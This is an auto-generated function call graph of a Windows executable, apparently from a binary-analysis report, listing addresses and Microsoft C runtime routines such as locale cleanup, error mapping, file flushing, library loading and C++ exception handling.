8187 c88564 8181->8187 8183 c89e01 ___free_lconv_mon 14 API calls 8182->8183 8184 c88560 8183->8184 8185 c885c1 8186 c89e01 ___free_lconv_mon 14 API calls 8185->8186 8186->8184 8187->8185 8187->8187 8188 c89da4 __dosmaperr 14 API calls 8187->8188 8189 c885d0 8187->8189 8191 c8914d ___std_exception_copy 29 API calls 8187->8191 8194 c885eb 8187->8194 8196 c89e01 ___free_lconv_mon 14 API calls 8187->8196 8188->8187 8200 c885f8 8189->8200 8191->8187 8193 c89e01 ___free_lconv_mon 14 API calls 8195 c885dd 8193->8195 8197 c89cc0 ___std_exception_copy 11 API calls 8194->8197 8198 c89e01 ___free_lconv_mon 14 API calls 8195->8198 8196->8187 8199 c885f7 8197->8199 8198->8184 8204 c88605 8200->8204 8205 c885d6 8200->8205 8201 c8861c 8203 c89e01 ___free_lconv_mon 14 API calls 8201->8203 8202 c89e01 ___free_lconv_mon 14 API calls 8202->8204 8203->8205 8204->8201 8204->8202 8205->8193 8570 c89fe8 8571 c89ff8 8570->8571 8581 c8a00e 8570->8581 8572 c89d91 __dosmaperr 14 API calls 8571->8572 8573 c89ffd 8572->8573 8574 c89cb0 ___std_exception_copy 29 API calls 8573->8574 8576 c8a007 8574->8576 8575 c8a079 8577 c88462 14 API calls 8575->8577 8578 c8a0bc 8577->8578 8580 c8a0c5 8578->8580 8586 c8a0db 8578->8586 8584 c89e01 ___free_lconv_mon 14 API calls 8580->8584 8581->8575 8582 c8a08d 8581->8582 8594 c8a165 8581->8594 8612 c8a51d 8582->8612 8583 c8a13b 8587 c89e01 ___free_lconv_mon 14 API calls 8583->8587 8584->8582 8586->8583 8591 c8a158 8586->8591 8618 c8d9c5 8586->8618 8588 c8a148 8587->8588 8589 c8a51d 14 API calls 8588->8589 8589->8576 8592 c89cc0 ___std_exception_copy 11 API calls 8591->8592 8593 c8a164 8592->8593 8595 c8a171 8594->8595 8595->8595 8596 c89da4 __dosmaperr 14 API calls 8595->8596 8597 c8a19f 8596->8597 8598 c8d9c5 29 API calls 8597->8598 8599 c8a1cb 8598->8599 8600 c89cc0 ___std_exception_copy 11 API calls 8599->8600 8601 c8a215 8600->8601 8602 c8a566 68 API calls 8601->8602 8603 c8a2dd 8602->8603 8627 c89fcb 8603->8627 8606 c8a341 8607 c8a566 68 API calls 8606->8607 8608 c8a37e 8607->8608 8630 c89f05 8608->8630 8611 c8a165 72 API calls 8616 c8a527 8612->8616 8613 c8a537 8615 c89e01 ___free_lconv_mon 14 API calls 8613->8615 8614 c89e01 ___free_lconv_mon 14 API calls 8614->8616 8617 c8a53e 8615->8617 8616->8613 8616->8614 8617->8576 8620 c8d90e 8618->8620 8619 c8d928 8621 c8d93c 8619->8621 8622 c89d91 __dosmaperr 14 API calls 8619->8622 8620->8619 8620->8621 8625 c8d961 8620->8625 8621->8586 8623 c8d932 8622->8623 8624 c89cb0 ___std_exception_copy 29 API calls 8623->8624 8624->8621 8625->8621 8626 c89d91 __dosmaperr 14 API calls 8625->8626 8626->8623 8653 c89e53 8627->8653 8631 c89f2f 8630->8631 8632 c89f13 8630->8632 8633 c89f52 8631->8633 8634 c89f36 8631->8634 8635 c8a5a5 14 API calls 8632->8635 8636 c8b2b9 __FrameHandler3::FrameUnwindToState WideCharToMultiByte 8633->8636 8649 c89f1d 8634->8649 8683 c8a5bf 8634->8683 8635->8649 8638 c89f62 8636->8638 8639 c89f69 GetLastError 8638->8639 8640 c89f7f 8638->8640 8642 c89d37 __dosmaperr 14 API calls 8639->8642 8641 c89f90 8640->8641 8643 c8a5bf 15 API calls 8640->8643 8644 c8a542 WideCharToMultiByte 8641->8644 8641->8649 8645 c89f75 8642->8645 8643->8641 8646 c89fa6 8644->8646 8647 c89d91 __dosmaperr 14 API calls 8645->8647 8648 c89faa GetLastError 8646->8648 8646->8649 8647->8649 8650 c89d37 __dosmaperr 14 API calls 8648->8650 8649->8611 8651 c89fb6 8650->8651 8652 c89d91 __dosmaperr 14 API calls 8651->8652 8652->8649 8654 c89e7b 8653->8654 8655 c89e61 8653->8655 8656 c89ea1 8654->8656 8657 c89e82 8654->8657 8671 c8a5a5 8655->8671 8659 c8b1ff __FrameHandler3::FrameUnwindToState MultiByteToWideChar 8656->8659 8670 c89e6b FindFirstFileExW 8657->8670 8675 c8a5fb 8657->8675 8661 c89eb0 8659->8661 8662 c89eb7 GetLastError 8661->8662 8664 c8a5fb 15 API calls 8661->8664 8667 c89edd 8661->8667 8663 c89d37 __dosmaperr 14 API calls 8662->8663 8666 c89ec3 8663->8666 8664->8667 8665 c8b1ff __FrameHandler3::FrameUnwindToState MultiByteToWideChar 8668 c89ef4 8665->8668 8669 c89d91 __dosmaperr 14 API calls 8666->8669 8667->8665 8667->8670 8668->8662 8668->8670 8669->8670 8670->8606 8672 c8a5b0 8671->8672 8674 c8a5b8 8671->8674 8673 c89e01 ___free_lconv_mon 14 API calls 8672->8673 8673->8674 8674->8670 8676 c8a5a5 14 API calls 8675->8676 8677 c8a609 8676->8677 8680 c8a63a 8677->8680 8681 c8bbef 15 API calls 8680->8681 8682 c8a61a 8681->8682 8682->8670 8684 c8a5a5 14 API calls 8683->8684 8685 c8a5cd 8684->8685 8686 c8a63a 15 API calls 8685->8686 8687 c8a5db 8686->8687 8687->8649 8212 c852ee 8213 c852fa 8212->8213 8214 c852fe 8212->8214 8217 c8530b ___scrt_release_startup_lock 8214->8217 8218 c855a9 IsProcessorFeaturePresent 8214->8218 8216 c85374 __FrameHandler3::FrameUnwindToState 8219 c855bf __FrameHandler3::FrameUnwindToState 8218->8219 8220 c8566a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8219->8220 8221 c856b5 __FrameHandler3::FrameUnwindToState 8220->8221 8221->8216 8793 c88b6e 8794 c897a0 _unexpected 68 API calls 8793->8794 8796 c88b79 8794->8796 8795 c88bb1 8796->8795 8797 c89d91 __dosmaperr 14 API calls 8796->8797 8798 c88ba6 8797->8798 8799 c89cb0 ___std_exception_copy 29 API calls 8798->8799 8799->8795 7395 c8d420 7396 c8d45a 7395->7396 7397 c89d91 __dosmaperr 14 API calls 7396->7397 7402 c8d46e 7396->7402 7398 c8d463 7397->7398 7399 c89cb0 ___std_exception_copy 29 API calls 7398->7399 7399->7402 7400 c85a25 CatchGuardHandler 5 API calls 7401 c8d47b 7400->7401 7402->7400 6884 c8c4e1 6885 c8c512 6884->6885 6887 c8c4ec 6884->6887 6886 c8c4fc FreeLibrary 6886->6887 6887->6885 6887->6886 8320 c90260 8321 c90280 8320->8321 8324 c906f8 8321->8324 8325 c90737 __startOneArgErrorHandling 8324->8325 8329 c907bf __startOneArgErrorHandling 8325->8329 8332 c90b9e 8325->8332 8327 c90eb2 __startOneArgErrorHandling 14 API calls 8328 c907f4 8327->8328 8330 c85a25 CatchGuardHandler 5 API calls 8328->8330 8329->8327 8329->8328 8331 c902a0 8330->8331 8333 c90bc1 __raise_exc RaiseException 8332->8333 8334 c90bbc 8333->8334 8334->8329 8172 c8b563 8173 c8b570 8172->8173 8174 c8b592 8172->8174 8175 c8b58c 8173->8175 8176 c8b57e DeleteCriticalSection 8173->8176 8177 c89e01 ___free_lconv_mon 14 API calls 8175->8177 8176->8175 8176->8176 8177->8174 6966 c904a7 6967 c904c0 __startOneArgErrorHandling 6966->6967 6969 c90511 __startOneArgErrorHandling 6967->6969 6970 c90850 6967->6970 6971 c90889 __startOneArgErrorHandling 6970->6971 6973 c908b0 __startOneArgErrorHandling 6971->6973 6981 c90bc1 6971->6981 6974 c908f3 6973->6974 6975 c908ce 6973->6975 6993 c90eb2 6974->6993 6985 c90ee3 6975->6985 6978 c908ee __startOneArgErrorHandling 6979 c85a25 CatchGuardHandler 5 API calls 6978->6979 6980 c90917 6979->6980 6980->6969 6982 c90bec __raise_exc 6981->6982 6983 c90de5 RaiseException 6982->6983 6984 c90dfd 6983->6984 6984->6973 6986 c90ef0 6985->6986 6987 c90eff __startOneArgErrorHandling 6986->6987 6988 c90f2e __startOneArgErrorHandling 6986->6988 6989 c90eb2 __startOneArgErrorHandling 14 API calls 6987->6989 6991 c90f7c 6988->6991 6992 c90eb2 __startOneArgErrorHandling 14 API calls 6988->6992 6990 c90f18 6989->6990 6990->6978 6991->6978 6992->6991 6994 c90ed6 6993->6994 6995 c90ebf 6993->6995 6996 c89d91 __dosmaperr 14 API calls 6994->6996 6997 c90edb 6995->6997 6998 c89d91 __dosmaperr 14 API calls 6995->6998 6996->6997 6997->6978 6999 c90ece 6998->6999 6999->6978 7403 c85426 7404 c85432 7403->7404 7405 c85448 7404->7405 7409 c8905c 7404->7409 7407 c85440 7414 c8654d 7407->7414 7410 c89079 ___scrt_uninitialize_crt 7409->7410 7411 c89067 7409->7411 7410->7407 7412 c89075 7411->7412 7420 c8cc7a 7411->7420 7412->7407 7415 c86560 7414->7415 7416 c86556 7414->7416 7415->7405 7492 c869e6 7416->7492 7423 c8cb0b 7420->7423 7426 c8ca5f 7423->7426 7427 c8ca6b __FrameHandler3::FrameUnwindToState 7426->7427 7434 c8b43d EnterCriticalSection 7427->7434 7429 c8cae1 7443 c8caff 7429->7443 7431 c8ca75 __FrameHandler3::FrameUnwindToState 7431->7429 7435 c8c9d3 7431->7435 7434->7431 7436 c8c9df __FrameHandler3::FrameUnwindToState 7435->7436 7446 c8cd97 EnterCriticalSection 7436->7446 7438 c8c9e9 __FrameHandler3::FrameUnwindToState 7439 c8ca22 7438->7439 7447 c8cc15 7438->7447 7458 c8ca53 7439->7458 7491 c8b485 LeaveCriticalSection 7443->7491 7445 c8caed 7445->7412 7446->7438 7448 c8cc2a __FrameHandler3::FrameUnwindToState 7447->7448 7449 c8cc3c 7448->7449 7450 c8cc31 7448->7450 7451 c8cbac __FrameHandler3::FrameUnwindToState 68 API calls 7449->7451 7452 c8cb0b ___scrt_uninitialize_crt 68 API calls 7450->7452 7453 c8cc46 7451->7453 7455 c8cc37 __FrameHandler3::FrameUnwindToState 7452->7455 7454 c8d3f4 __FrameHandler3::FrameUnwindToState 29 API calls 7453->7454 7453->7455 7456 c8cc5d 7454->7456 7455->7439 7461 c8df04 7456->7461 7490 c8cdab LeaveCriticalSection 7458->7490 7460 c8ca41 7460->7431 7462 c8df22 7461->7462 7463 c8df15 7461->7463 7464 c8df6b 7462->7464 7468 c8df49 7462->7468 7465 c89d91 __dosmaperr 14 API calls 7463->7465 7466 c89d91 __dosmaperr 14 API calls 7464->7466 7467 c8df1a 7465->7467 7469 c8df70 7466->7469 7467->7455 7472 c8de62 7468->7472 7471 c89cb0 ___std_exception_copy 29 API calls 7469->7471 7471->7467 7473 c8de6e __FrameHandler3::FrameUnwindToState 7472->7473 7485 c8b636 EnterCriticalSection 7473->7485 7475 c8de7d 7476 c8dec2 7475->7476 7477 c8b70d __FrameHandler3::FrameUnwindToState 29 API calls 7475->7477 7478 c89d91 __dosmaperr 14 API calls 7476->7478 7479 c8dea9 FlushFileBuffers 7477->7479 7480 c8dec9 7478->7480 7479->7480 7481 c8deb5 GetLastError 7479->7481 7486 c8def8 7480->7486 7482 c89d7e __dosmaperr 14 API calls 7481->7482 7482->7476 7485->7475 7489 c8b659 LeaveCriticalSection 7486->7489 7488 c8dee1 7488->7467 7489->7488 7490->7460 7491->7445 7493 c8655b 7492->7493 7494 c869f0 7492->7494 7496 c86a3d 7493->7496 7500 c86bc9 7494->7500 7497 c86a67 7496->7497 7498 c86a48 7496->7498 7497->7415 7499 c86a52 DeleteCriticalSection 7498->7499 7499->7497 7499->7499 7505 c86aa3 7500->7505 7503 c86bfb TlsFree 7504 c86bef 7503->7504 7504->7493 7506 c86ac0 7505->7506 7507 c86ac4 7505->7507 7506->7503 7506->7504 7507->7506 7508 c86b2c GetProcAddress 7507->7508 7510 c86b1d 7507->7510 7512 c86b43 LoadLibraryExW 7507->7512 7508->7506 7510->7508 7511 c86b25 FreeLibrary 7510->7511 7511->7508 7513 c86b5a GetLastError 7512->7513 7514 c86b8a 7512->7514 7513->7514 7515 c86b65 ___vcrt_FlsFree 7513->7515 7514->7507 7515->7514 7516 c86b7b LoadLibraryExW 7515->7516 7516->7507 8335 c89667 8336 c89672 8335->8336 8337 c89682 8335->8337 8341 c89688 8336->8341 8340 c89e01 ___free_lconv_mon 14 API calls 8340->8337 8342 c8969d 8341->8342 8343 c896a3 8341->8343 8344 c89e01 ___free_lconv_mon 14 API calls 8342->8344 8345 c89e01 ___free_lconv_mon 14 API calls 8343->8345 8344->8343 8346 c896af 8345->8346 8347 c89e01 ___free_lconv_mon 14 API calls 8346->8347 8348 c896ba 8347->8348 8349 c89e01 ___free_lconv_mon 14 API calls 8348->8349 8350 c896c5 8349->8350 8351 c89e01 ___free_lconv_mon 14 API calls 8350->8351 8352 c896d0 8351->8352 8353 c89e01 ___free_lconv_mon 14 API calls 8352->8353 8354 c896db 8353->8354 8355 c89e01 ___free_lconv_mon 14 API calls 8354->8355 8356 c896e6 8355->8356 8357 c89e01 ___free_lconv_mon 14 API calls 8356->8357 8358 c896f1 8357->8358 8359 c89e01 ___free_lconv_mon 14 API calls 8358->8359 8360 c896fc 8359->8360 8361 c89e01 ___free_lconv_mon 14 API calls 8360->8361 8362 c8970a 8361->8362 8367 c894b4 8362->8367 8368 c894c0 __FrameHandler3::FrameUnwindToState 8367->8368 8383 c8b43d EnterCriticalSection 8368->8383 8370 c894f4 8384 c89513 8370->8384 8372 c894ca 8372->8370 8374 c89e01 ___free_lconv_mon 14 API calls 8372->8374 8374->8370 8375 c8951f 8376 c8952b __FrameHandler3::FrameUnwindToState 8375->8376 8388 c8b43d EnterCriticalSection 8376->8388 8378 c89535 8389 c89755 8378->8389 8380 c89548 8393 c89568 8380->8393 8383->8372 8387 c8b485 LeaveCriticalSection 8384->8387 8386 c89501 8386->8375 8387->8386 8388->8378 8390 c89764 __dosmaperr 8389->8390 8392 c8978b __dosmaperr 8389->8392 8390->8392 8396 c8bddb 8390->8396 8392->8380 8510 c8b485 LeaveCriticalSection 8393->8510 8395 c89556 8395->8340 8397 c8bdf1 8396->8397 8399 c8be5b 8396->8399 8397->8399 8401 c8be24 8397->8401 8406 c89e01 ___free_lconv_mon 14 API calls 8397->8406 8400 c89e01 ___free_lconv_mon 14 API calls 8399->8400 8423 c8bea9 8399->8423 8402 c8be7d 8400->8402 8403 c8be46 8401->8403 8412 c89e01 ___free_lconv_mon 14 API calls 8401->8412 8404 c89e01 ___free_lconv_mon 14 API calls 8402->8404 8405 c89e01 ___free_lconv_mon 14 API calls 8403->8405 8407 c8be90 8404->8407 8408 c8be50 8405->8408 8410 c8be19 8406->8410 8413 c89e01 ___free_lconv_mon 14 API calls 8407->8413 8416 c89e01 ___free_lconv_mon 14 API calls 8408->8416 8409 c8bf17 8417 c89e01 ___free_lconv_mon 14 API calls 8409->8417 8424 c8b97f 8410->8424 8411 c8beb7 8411->8409 8419 c89e01 14 API calls ___free_lconv_mon 8411->8419 8414 c8be3b 8412->8414 8415 c8be9e 8413->8415 8452 c8ba7d 8414->8452 8421 c89e01 ___free_lconv_mon 14 API calls 8415->8421 8416->8399 8422 c8bf1d 8417->8422 8419->8411 8421->8423 8422->8392 8464 c8bf4c 8423->8464 8425 c8b990 8424->8425 8451 c8ba79 8424->8451 8426 c8b9a1 8425->8426 8427 c89e01 ___free_lconv_mon 14 API calls 8425->8427 8428 c8b9b3 8426->8428 8429 c89e01 ___free_lconv_mon 14 API calls 8426->8429 8427->8426 8430 c8b9c5 8428->8430 8431 c89e01 ___free_lconv_mon 14 API calls 8428->8431 8429->8428 8432 c8b9d7 8430->8432 8434 c89e01 ___free_lconv_mon 14 API calls 8430->8434 8431->8430 8433 c8b9e9 8432->8433 8435 c89e01 ___free_lconv_mon 14 API calls 8432->8435 8436 c8b9fb 8433->8436 8437 c89e01 ___free_lconv_mon 14 API calls 8433->8437 8434->8432 8435->8433 8438 c8ba0d 8436->8438 8439 c89e01 ___free_lconv_mon 14 API calls 8436->8439 8437->8436 8440 c89e01 ___free_lconv_mon 14 API calls 8438->8440 8442 c8ba1f 8438->8442 8439->8438 8440->8442 8441 c89e01 ___free_lconv_mon 14 API calls 8443 c8ba31 8441->8443 8442->8441 8442->8443 8444 c89e01 ___free_lconv_mon 14 API calls 8443->8444 8445 c8ba43 8443->8445 8444->8445 8446 c8ba55 8445->8446 8447 c89e01 ___free_lconv_mon 14 API calls 8445->8447 8448 c8ba67 8446->8448 8449 c89e01 ___free_lconv_mon 14 API calls 8446->8449 8447->8446 8450 c89e01 ___free_lconv_mon 14 API calls 8448->8450 8448->8451 8449->8448 8450->8451 8451->8401 8453 c8ba8a 8452->8453 8463 c8bae2 8452->8463 8454 c8ba9a 8453->8454 8455 c89e01 ___free_lconv_mon 14 API calls 8453->8455 8456 c8baac 8454->8456 8458 c89e01 ___free_lconv_mon 14 API calls 8454->8458 8455->8454 8457 c8babe 8456->8457 8459 c89e01 ___free_lconv_mon 14 API calls 8456->8459 8460 c8bad0 8457->8460 8461 c89e01 ___free_lconv_mon 14 API calls 8457->8461 8458->8456 8459->8457 8462 c89e01 ___free_lconv_mon 14 API calls 8460->8462 8460->8463 8461->8460 8462->8463 8463->8403 8465 c8bf59 8464->8465 8469 c8bf78 8464->8469 8465->8469 8470 c8bb0b 8465->8470 8468 c89e01 ___free_lconv_mon 14 API calls 8468->8469 8469->8411 8471 c8bbe9 8470->8471 8472 c8bb1c 8470->8472 8471->8468 8506 c8bae6 8472->8506 8475 c8bae6 __dosmaperr 14 API calls 8476 c8bb2f 8475->8476 8477 c8bae6 __dosmaperr 14 API calls 8476->8477 8478 c8bb3a 8477->8478 8479 c8bae6 __dosmaperr 14 API calls 8478->8479 8480 c8bb45 8479->8480 8481 c8bae6 __dosmaperr 14 API calls 8480->8481 8482 c8bb53 8481->8482 8483 c89e01 ___free_lconv_mon 14 API calls 8482->8483 8484 c8bb5e 8483->8484 8485 c89e01 ___free_lconv_mon 14 API calls 8484->8485 8486 c8bb69 8485->8486 8487 c89e01 ___free_lconv_mon 14 API calls 8486->8487 8488 c8bb74 8487->8488 8489 c8bae6 __dosmaperr 14 API calls 8488->8489 8490 c8bb82 8489->8490 8491 c8bae6 __dosmaperr 14 API calls 8490->8491 8492 c8bb90 8491->8492 8493 c8bae6 __dosmaperr 14 API calls 8492->8493 8494 c8bba1 8493->8494 8495 c8bae6 __dosmaperr 14 API calls 8494->8495 8496 c8bbaf 8495->8496 8497 c8bae6 __dosmaperr 14 API calls 8496->8497 8498 c8bbbd 8497->8498 8499 c89e01 ___free_lconv_mon 14 API calls 8498->8499 8500 c8bbc8 8499->8500 8501 c89e01 ___free_lconv_mon 14 API calls 8500->8501 8502 c8bbd3 8501->8502 8503 c89e01 ___free_lconv_mon 14 API calls 8502->8503 8504 c8bbde 8503->8504 8505 c89e01 ___free_lconv_mon 14 API calls 8504->8505 8505->8471 8507 c8baf8 8506->8507 8508 c8bb07 8507->8508 8509 c89e01 ___free_lconv_mon 14 API calls 8507->8509 8508->8475 8509->8507 8510->8395 8532 c88627 8533 c88639 8532->8533 8534 c8863f 8532->8534 8535 c885f8 14 API calls 8533->8535 8535->8534 7517 c8783a 7518 c87848 ___except_validate_context_record 7517->7518 7526 c86913 7518->7526 7520 c8784e 7521 c8788d 7520->7521 7524 c878b3 7520->7524 7525 c878ab 7520->7525 7521->7525 7539 c87c59 7521->7539 7524->7525 7542 c872d1 7524->7542 7593 c86921 7526->7593 7528 c86918 7528->7520 7607 c8c79c 7528->7607 7532 c891c1 IsProcessorFeaturePresent 7535 c891cd 7532->7535 7534 c891b7 7534->7532 7538 c891e0 7534->7538 7537 c89ab4 __FrameHandler3::FrameUnwindToState 8 API calls 7535->7537 7537->7538 7643 c88a3f 7538->7643 7675 c87c71 7539->7675 7541 c87c6c 7541->7525 7546 c872f1 __FrameHandler3::FrameUnwindToState 7542->7546 7543 c87604 7544 c891a7 __FrameHandler3::FrameUnwindToState 68 API calls 7543->7544 7556 c8760a 7543->7556 7545 c87675 7544->7545 7546->7543 7549 c873d3 7546->7549 7550 c86913 __CreateFrameInfo 78 API calls 7546->7550 7547 c875d9 7547->7543 7548 c875d7 7547->7548 7709 c87676 7547->7709 7552 c86913 __CreateFrameInfo 78 API calls 7548->7552 7549->7547 7551 c8745c 7549->7551 7591 c873d9 type_info::operator== 7549->7591 7553 c87353 7550->7553 7558 c87573 __InternalCxxFrameHandler 7551->7558 7694 c86cc4 7551->7694 7552->7543 7553->7556 7557 c86913 __CreateFrameInfo 78 API calls 7553->7557 7556->7525 7560 c87361 7557->7560 7558->7548 7559 c875a3 7558->7559 7561 c875c8 7558->7561 7562 c875ad 7558->7562 7559->7548 7559->7562 7563 c86913 __CreateFrameInfo 78 API calls 7560->7563 7565 c87d59 __InternalCxxFrameHandler 68 API calls 7561->7565 7564 c86913 __CreateFrameInfo 78 API calls 7562->7564 7570 c87369 7563->7570 7566 c875b8 7564->7566 7567 c875d1 7565->7567 7568 c86913 __CreateFrameInfo 78 API calls 7566->7568 7567->7548 7569 c87634 7567->7569 7568->7591 7572 c86913 __CreateFrameInfo 78 API calls 7569->7572 7570->7543 7571 c86913 __CreateFrameInfo 78 API calls 7570->7571 7573 c873b2 7571->7573 7574 c87639 7572->7574 7573->7549 7578 c86913 __CreateFrameInfo 78 API calls 7573->7578 7576 c86913 __CreateFrameInfo 78 API calls 7574->7576 7579 c87641 7576->7579 7577 c8747d ___TypeMatch 7577->7558 7699 c87251 7577->7699 7580 c873bc 7578->7580 7735 c86eb7 RtlUnwind 7579->7735 7583 c86913 __CreateFrameInfo 78 API calls 7580->7583 7586 c873c7 7583->7586 7584 c87655 7587 c87c59 __InternalCxxFrameHandler 78 API calls 7584->7587 7585 c87614 __InternalCxxFrameHandler 7732 c87f46 7585->7732 7689 c87d59 7586->7689 7589 c87661 __InternalCxxFrameHandler 7587->7589 7736 c87bd0 7589->7736 7591->7585 7726 c890eb 7591->7726 7594 c8692a 7593->7594 7595 c8692d GetLastError 7593->7595 7594->7528 7646 c86c04 7595->7646 7598 c86961 7599 c869a7 SetLastError 7598->7599 7599->7528 7601 c8695b __CreateFrameInfo 7601->7598 7602 c86983 7601->7602 7603 c86c3f ___vcrt_FlsSetValue 6 API calls 7601->7603 7604 c86c3f ___vcrt_FlsSetValue 6 API calls 7602->7604 7605 c86997 7602->7605 7603->7602 7604->7605 7606 c89127 ___std_exception_copy 14 API calls 7605->7606 7606->7598 7656 c8c6ca 7607->7656 7610 c8c7e1 7611 c8c7ed __FrameHandler3::FrameUnwindToState 7610->7611 7612 c898f1 __dosmaperr 14 API calls 7611->7612 7613 c8c83d 7611->7613 7614 c8c84f __FrameHandler3::FrameUnwindToState 7611->7614 7619 c8c81e __FrameHandler3::FrameUnwindToState 7611->7619 7612->7619 7615 c89d91 __dosmaperr 14 API calls 7613->7615 7616 c8c885 __FrameHandler3::FrameUnwindToState 7614->7616 7667 c8b43d EnterCriticalSection 7614->7667 7617 c8c842 7615->7617 7623 c8c9bf 7616->7623 7624 c8c8c2 7616->7624 7634 c8c8f0 7616->7634 7620 c89cb0 ___std_exception_copy 29 API calls 7617->7620 7619->7613 7619->7614 7621 c8c827 7619->7621 7620->7621 7621->7534 7629 c8c9ca 7623->7629 7672 c8b485 LeaveCriticalSection 7623->7672 7628 c897a0 _unexpected 68 API calls 7624->7628 7624->7634 7626 c88a3f __FrameHandler3::FrameUnwindToState 21 API calls 7633 c8c9d2 __FrameHandler3::FrameUnwindToState 7626->7633 7630 c8c8e5 7628->7630 7629->7626 7632 c897a0 _unexpected 68 API calls 7630->7632 7631 c897a0 _unexpected 68 API calls 7636 c8c945 7631->7636 7632->7634 7673 c8cd97 EnterCriticalSection 7633->7673 7668 c8c96b 7634->7668 7636->7621 7637 c897a0 _unexpected 68 API calls 7636->7637 7637->7621 7638 c8c9e9 __FrameHandler3::FrameUnwindToState 7639 c8ca22 7638->7639 7642 c8cc15 __FrameHandler3::FrameUnwindToState 68 API calls 7638->7642 7640 c8ca53 __FrameHandler3::FrameUnwindToState LeaveCriticalSection 7639->7640 7641 c8ca41 7640->7641 7641->7534 7642->7639 7644 c888af __FrameHandler3::FrameUnwindToState 21 API calls 7643->7644 7645 c88a50 7644->7645 7647 c86aa3 ___vcrt_FlsFree 5 API calls 7646->7647 7648 c86c1e 7647->7648 7649 c86942 7648->7649 7650 c86c36 TlsGetValue 7648->7650 7649->7598 7649->7599 7651 c86c3f 7649->7651 7650->7649 7652 c86aa3 ___vcrt_FlsFree 5 API calls 7651->7652 7653 c86c59 7652->7653 7654 c86c74 TlsSetValue 7653->7654 7655 c86c68 7653->7655 7654->7655 7655->7601 7657 c8c6d6 __FrameHandler3::FrameUnwindToState 7656->7657 7662 c8b43d EnterCriticalSection 7657->7662 7659 c8c6e4 7663 c8c726 7659->7663 7662->7659 7666 c8b485 LeaveCriticalSection 7663->7666 7665 c891ac 7665->7534 7665->7610 7666->7665 7667->7616 7669 c8c937 7668->7669 7670 c8c96f 7668->7670 7669->7621 7669->7631 7669->7636 7674 c8b485 LeaveCriticalSection 7670->7674 7672->7629 7673->7638 7674->7669 7676 c87c7d __FrameHandler3::FrameUnwindToState 7675->7676 7677 c86913 __CreateFrameInfo 78 API calls 7676->7677 7683 c87c98 __CallSettingFrame@12 __FrameHandler3::FrameUnwindToState 7677->7683 7678 c87d18 7680 c891a7 __FrameHandler3::FrameUnwindToState 68 API calls 7678->7680 7682 c87d1d __FrameHandler3::FrameUnwindToState 7678->7682 7681 c87d58 7680->7681 7682->7541 7683->7678 7684 c87d3f 7683->7684 7685 c86913 __CreateFrameInfo 78 API calls 7684->7685 7686 c87d44 7685->7686 7687 c87d4f 7686->7687 7688 c86913 __CreateFrameInfo 78 API calls 7686->7688 7687->7678 7688->7687 7690 c87ded 7689->7690 7693 c87d6d ___TypeMatch 7689->7693 7691 c891a7 __FrameHandler3::FrameUnwindToState 68 API calls 7690->7691 7692 c87df2 7691->7692 7693->7549 7695 c86ce2 7694->7695 7696 c86d18 7695->7696 7697 c891a7 __FrameHandler3::FrameUnwindToState 68 API calls 7695->7697 7696->7577 7698 c86d33 7697->7698 7700 c87270 7699->7700 7701 c87263 7699->7701 7755 c86eb7 RtlUnwind 7700->7755 7751 c871b8 7701->7751 7704 c87285 7705 c87c71 __FrameHandler3::FrameUnwindToState 78 API calls 7704->7705 7706 c87296 __FrameHandler3::FrameUnwindToState 7705->7706 7756 c87a01 7706->7756 7708 c872be CatchIt 7708->7577 7710 c8768c 7709->7710 7721 c877a1 7709->7721 7711 c86913 __CreateFrameInfo 78 API calls 7710->7711 7712 c87693 7711->7712 7713 c8769a EncodePointer 7712->7713 7714 c876d5 7712->7714 7715 c86913 __CreateFrameInfo 78 API calls 7713->7715 7716 c876f2 7714->7716 7717 c877a6 7714->7717 7714->7721 7722 c876a8 7715->7722 7719 c86cc4 __InternalCxxFrameHandler 68 API calls 7716->7719 7718 c891a7 __FrameHandler3::FrameUnwindToState 68 API calls 7717->7718 7720 c877ab 7718->7720 7724 c87709 7719->7724 7721->7548 7722->7714 7723 c86d91 __InternalCxxFrameHandler 78 API calls 7722->7723 7723->7714 7724->7721 7725 c87251 CatchIt 79 API calls 7724->7725 7725->7724 7727 c890f7 __FrameHandler3::FrameUnwindToState 7726->7727 7728 c897a0 _unexpected 68 API calls 7727->7728 7729 c890fc 7728->7729 7730 c891a7 __FrameHandler3::FrameUnwindToState 68 API calls 7729->7730 7731 c89126 7730->7731 7733 c87f8d RaiseException 7732->7733 7734 c87f60 7732->7734 7733->7569 7734->7733 7735->7584 7737 c87bdc __EH_prolog3_catch 7736->7737 7738 c86913 __CreateFrameInfo 78 API calls 7737->7738 7739 c87be1 7738->7739 7740 c87c04 7739->7740 7816 c87e7c 7739->7816 7741 c891a7 __FrameHandler3::FrameUnwindToState 68 API calls 7740->7741 7748 c87c09 7741->7748 7744 c87c55 7744->7543 7748->7744 7749 c86913 __CreateFrameInfo 78 API calls 7748->7749 7750 c87c4b 7749->7750 7750->7543 7752 c871c4 __FrameHandler3::FrameUnwindToState 7751->7752 7770 c8707a 7752->7770 7754 c871ec CatchIt ___AdjustPointer 7754->7700 7755->7704 7757 c87a0d __FrameHandler3::FrameUnwindToState 7756->7757 7777 c86f3b 7757->7777 7760 c86913 __CreateFrameInfo 78 API calls 7761 c87a39 7760->7761 7762 c86913 __CreateFrameInfo 78 API calls 7761->7762 7763 c87a44 7762->7763 7764 c86913 __CreateFrameInfo 78 API calls 7763->7764 7765 c87a4f 7764->7765 7766 c86913 __CreateFrameInfo 78 API calls 7765->7766 7767 c87a57 CatchIt 7766->7767 7782 c87b54 7767->7782 7769 c87b3c 7769->7708 7772 c87086 __FrameHandler3::FrameUnwindToState 7770->7772 7771 c87101 CatchIt ___AdjustPointer 7771->7754 7772->7771 7773 c891a7 __FrameHandler3::FrameUnwindToState 68 API calls 7772->7773 7774 c871b7 __FrameHandler3::FrameUnwindToState 7773->7774 7775 c8707a CatchIt 68 API calls 7774->7775 7776 c871ec CatchIt ___AdjustPointer 7775->7776 7776->7754 7778 c86913 __CreateFrameInfo 78 API calls 7777->7778 7779 c86f4c 7778->7779 7780 c86913 __CreateFrameInfo 78 API calls 7779->7780 7781 c86f57 7780->7781 7781->7760 7791 c86f5f 7782->7791 7784 c87b65 7785 c86913 __CreateFrameInfo 78 API calls 7784->7785 7786 c87b6b 7785->7786 7787 c86913 __CreateFrameInfo 78 API calls 7786->7787 7789 c87b76 7787->7789 7788 c87bb7 __InternalCxxFrameHandler 7788->7769 7789->7788 7808 c866a6 7789->7808 7792 c86913 __CreateFrameInfo 78 API calls 7791->7792 7793 c86f68 7792->7793 7794 c86f7e 7793->7794 7795 c86f70 7793->7795 7797 c86913 